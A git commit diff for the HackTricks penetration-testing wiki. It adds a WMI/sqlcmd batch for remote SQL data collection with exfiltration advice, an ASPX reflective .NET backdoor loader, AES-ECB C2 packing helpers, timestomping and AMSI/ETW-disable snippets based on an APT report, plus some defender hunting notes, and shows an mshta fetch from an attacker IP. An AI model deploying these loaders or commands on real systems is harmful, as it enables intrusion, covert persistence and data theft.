Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

carlospolop · carlospolop · commit 1a1b63f8530a · 2025-09-30T23:10:40.000+02:00
diff --git a/searchindex.js b/searchindex.js
diff --git a/src/SUMMARY.md b/src/SUMMARY.md
@@ -104,6 +104,7 @@
 
 # 🐧 Linux Hardening
 
+- [Linux Basics](linux-hardening/linux-basics.md)
 - [Checklist - Linux Privilege Escalation](linux-hardening/linux-privilege-escalation-checklist.md)
 - [Linux Privilege Escalation](linux-hardening/privilege-escalation/README.md)
   - [Android Rooting Frameworks Manager Auth Bypass Syscall Hook](linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md)
diff --git a/src/binary-exploitation/freebsd-ptrace-rfi-vm_map-prot_exec-bypass-ps5.md b/src/binary-exploitation/freebsd-ptrace-rfi-vm_map-prot_exec-bypass-ps5.md
@@ -1,6 +1,6 @@
 # FreeBSD ptrace RFI and vm_map PROT_EXEC bypass (PS5 case study)
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../banners/hacktricks-training.md}}
 
 ## Overview
 
@@ -196,4 +196,4 @@ int main(){
 - [gdbsrv](https://github.com/ps5-payload-dev/gdbsrv)
 - [FreeBSD klog reference](https://lists.freebsd.org/pipermail/freebsd-questions/2006-October/134233.html)
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md b/src/binary-exploitation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md
@@ -1,6 +1,6 @@
 # POSIX CPU Timers TOCTOU race (CVE-2025-38352)
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
 
 This page documents a TOCTOU race condition in Linux/Android POSIX CPU timers that can corrupt timer state and crash the kernel, and under some circumstances be steered toward privilege escalation.
 
@@ -210,4 +210,4 @@ Notes for exploitation research
 - [Android security bulletin – September 2025](https://source.android.com/docs/security/bulletin/2025-09-01)
 - [Android common kernel patch commit 157f357d50b5…](https://android.googlesource.com/kernel/common/+/157f357d50b5038e5eaad0b2b438f923ac40afeb%5E%21/#F0)
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -253,6 +253,41 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec ho
 mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
 ```
 
+### WMI-based remote SQL collection (sqlcmd + CSV export)
+
+Operators can pivot from an IIS/app tier to SQL Servers using WMI to execute a small batch that authenticates to MSSQL and runs ad‑hoc queries, exporting results to CSV. This keeps collection simple and blends with admin activity.
+
+Example mssq.bat
+```bat
+@echo off
+rem Usage: mssq.bat <server> <user> <pass> <"SQL"> <out.csv>
+set S=%1
+set U=%2
+set P=%3
+set Q=%4
+set O=%5
+rem Remove headers, trim trailing spaces, CSV separator = comma
+sqlcmd -S %S% -U %U% -P %P% -Q "SET NOCOUNT ON; %Q%" -W -h -1 -s "," -o "%O%"
+```
+
+Invoke it remotely with WMI
+```cmd
+wmic /node:SQLHOST /user:DOMAIN\user /password:Passw0rd! process call create "cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd \"SELECT TOP(100) name FROM sys.tables\" C:\\Windows\\Temp\\out.csv"
+```
+
+PowerShell alternative
+```powershell
+$cmd = 'cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd "SELECT name FROM sys.databases" C:\\Windows\\Temp\\dbs.csv'
+Invoke-WmiMethod -ComputerName SQLHOST -Class Win32_Process -Name Create -ArgumentList $cmd
+```
+
+Notes
+- sqlcmd may be missing; fall back to osql, PowerShell Invoke-Sqlcmd, or a one‑liner using System.Data.SqlClient.
+- Use quoting carefully; long/complex queries are easier to supply via a file or Base64‑encoded argument decoded inside the batch/PowerShell stub.
+- Exfil the CSV via SMB (e.g., copy from \\SQLHOST\C$\Windows\Temp) or compress and move through your C2.
+
+
+
 ### Get hashed passwords
 
 ```bash
@@ -631,6 +666,18 @@ You probably will be able to **escalate to Administrator** following one of thes
 
 ## References
 
+- [Unit 42 – Phantom Taurus: WMI-driven direct SQL collection via batch/sqlcmd](https://unit42.paloaltonetworks.com/phantom-taurus/)
+- [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
+- [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
+- [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
+- [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
+- [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/)
+- [https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/)
+- [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)
+- [https://mayfly277.github.io/posts/GOADv2-pwning-part12/](https://mayfly277.github.io/posts/GOADv2-pwning-part12/)
+- [https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp](https://exploit7-tr.translate.goog/posts/sqlserver/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)
+
+
 - [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users)
 - [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/)
 - [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
diff --git a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md
@@ -229,8 +229,105 @@ If you have filesystem or interactive access on the web server, co-located keys
 
 With the key ring available, an operator running in the app’s identity can instantiate an IDataProtector with the same purposes and unprotect stored secrets. Misconfigurations that store the key ring with the app files make offline decryption trivial once the host is compromised.
 
+## IIS fileless backdoors and in-memory .NET loaders (NET-STAR style)
+
+The Phantom Taurus/NET-STAR toolkit shows a mature pattern for fileless IIS persistence and post‑exploitation entirely inside w3wp.exe. The core ideas are broadly reusable for custom tradecraft and for detection/hunting.
+
+Key building blocks
+- ASPX bootstrapper hosting an embedded payload: a single .aspx page (e.g., OutlookEN.aspx) carries a Base64‑encoded, optionally Gzip‑compressed .NET DLL. Upon a trigger request it decodes, decompresses and reflectively loads it into the current AppDomain and invokes the main entry point (e.g., ServerRun.Run()).
+- Cookie‑scoped, encrypted C2 with multi‑stage packing: tasks/results are wrapped with Gzip → AES‑ECB/PKCS7 → Base64 and moved via seemingly legitimate cookie‑heavy requests; operators used stable delimiters (e.g., "STAR") for chunking.
+- Reflective .NET execution: accept arbitrary managed assemblies as Base64, load via Assembly.Load(byte[]) and pass operator args for rapid module swaps without touching disk.
+- Operating in precompiled ASP.NET sites: add/manage auxiliary shells/backdoors even when the site is precompiled (e.g., dropper adds dynamic pages/handlers or leverages config handlers) – exposed by commands such as bypassPrecompiledApp, addshell, listshell, removeshell.
+- Timestomping/metadata forgery: expose a changeLastModified action and timestomp on deployment (including future compilation timestamps) to hinder DFIR.
+- Optional AMSI/ETW pre‑disable for loaders: a second‑stage loader can disable AMSI and ETW before calling Assembly.Load to reduce inspection of in‑memory payloads.
+
+Minimal ASPX loader pattern
+```aspx
+<%@ Page Language="C#" %>
+<%@ Import Namespace="System" %>
+<%@ Import Namespace="System.IO" %>
+<%@ Import Namespace="System.IO.Compression" %>
+<%@ Import Namespace="System.Reflection" %>
+<script runat="server">
+protected void Page_Load(object sender, EventArgs e){
+    // 1) Obtain payload bytes (hard‑coded blob or from request)
+    string b64 = /* hardcoded or Request["d"] */;
+    byte[] blob = Convert.FromBase64String(b64);
+    // optional: decrypt here if AES is used
+    using(var gz = new GZipStream(new MemoryStream(blob), CompressionMode.Decompress)){
+        using(var ms = new MemoryStream()){
+            gz.CopyTo(ms);
+            var asm = Assembly.Load(ms.ToArray());
+            // 2) Invoke the managed entry point (e.g., ServerRun.Run)
+            var t = asm.GetType("ServerRun");
+            var m = t.GetMethod("Run", BindingFlags.Public|BindingFlags.NonPublic|BindingFlags.Static|BindingFlags.Instance);
+            object inst = m.IsStatic ? null : Activator.CreateInstance(t);
+            m.Invoke(inst, new object[]{ HttpContext.Current });
+        }
+    }
+}
+</script>
+```
+
+Packing/crypto helpers (Gzip + AES‑ECB + Base64)
+```csharp
+using System.Security.Cryptography;
+
+static byte[] AesEcb(byte[] data, byte[] key, bool encrypt){
+    using(var aes = Aes.Create()){
+        aes.Mode = CipherMode.ECB; aes.Padding = PaddingMode.PKCS7; aes.Key = key;
+        ICryptoTransform t = encrypt ? aes.CreateEncryptor() : aes.CreateDecryptor();
+        return t.TransformFinalBlock(data, 0, data.Length);
+    }
+}
+
+static string Pack(object obj, byte[] key){
+    // serialize → gzip → AES‑ECB → Base64
+    byte[] raw = Serialize(obj);                    // your TLV/JSON/msgpack
+    using var ms = new MemoryStream();
+    using(var gz = new GZipStream(ms, CompressionLevel.Optimal, true)) gz.Write(raw, 0, raw.Length);
+    byte[] enc = AesEcb(ms.ToArray(), key, true);
+    return Convert.ToBase64String(enc);
+}
+
+static T Unpack<T>(string b64, byte[] key){
+    byte[] enc = Convert.FromBase64String(b64);
+    byte[] cmp = AesEcb(enc, key, false);
+    using var gz = new GZipStream(new MemoryStream(cmp), CompressionMode.Decompress);
+    using var outMs = new MemoryStream(); gz.CopyTo(outMs);
+    return Deserialize<T>(outMs.ToArray());
+}
+```
+
+Cookie/session flow and command surface
+- Session bootstrap and tasking are carried via cookies to blend with normal web activity.
+- Commands observed in the wild included: fileExist, listDir, createDir, renameDir, fileRead, deleteFile, createFile, changeLastModified; addshell, bypassPrecompiledApp, listShell, removeShell; executeSQLQuery, ExecuteNonQuery; and dynamic execution primitives code_self, code_pid, run_code for in‑memory .NET execution.
+
+Timestomping utility
+```csharp
+File.SetCreationTime(path, ts); 
+File.SetLastWriteTime(path, ts);
+File.SetLastAccessTime(path, ts);
+```
+
+Inline AMSI/ETW disable before Assembly.Load (loader variant)
+```csharp
+// Patch amsi!AmsiScanBuffer to return E_INVALIDARG
+// and ntdll!EtwEventWrite to a stub; then load operator assembly
+DisableAmsi();
+DisableEtw();
+Assembly.Load(payloadBytes).EntryPoint.Invoke(null, new object[]{ new string[]{ /* args */ } });
+```
+See AMSI/ETW bypass techniques in: windows-hardening/av-bypass.md
+
+Hunting notes (defenders)
+- Single, odd ASPX page with very long Base64/Gzip blobs; cookie‑heavy posts.
+- Unbacked managed modules inside w3wp.exe; strings like Encrypt/Decrypt (ECB), Compress/Decompress, GetContext, Run.
+- Repeated delimiters like "STAR" in traffic; mismatched or even future timestamps on ASPX/assemblies.
+
 ## Old IIS vulnerabilities worth looking for
 
+
 ### Microsoft IIS tilde character “\~” Vulnerability/Feature – Short File/Folder Name Disclosure
 
 You can try to **enumerate folders and files** inside every discovered folder (even if it's requiring Basic Authentication) using this **technique**.\
@@ -300,4 +397,9 @@ HTTP/1.1 401 Unauthorized
 HTTP/1.1 200 OK
 ```
 
+## References
+
+- [Unit 42 – Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite](https://unit42.paloaltonetworks.com/phantom-taurus/)
+- [AMSI/ETW bypass background (HackTricks)](../../windows-hardening/av-bypass.md)
+
 {{#include ../../banners/hacktricks-training.md}}
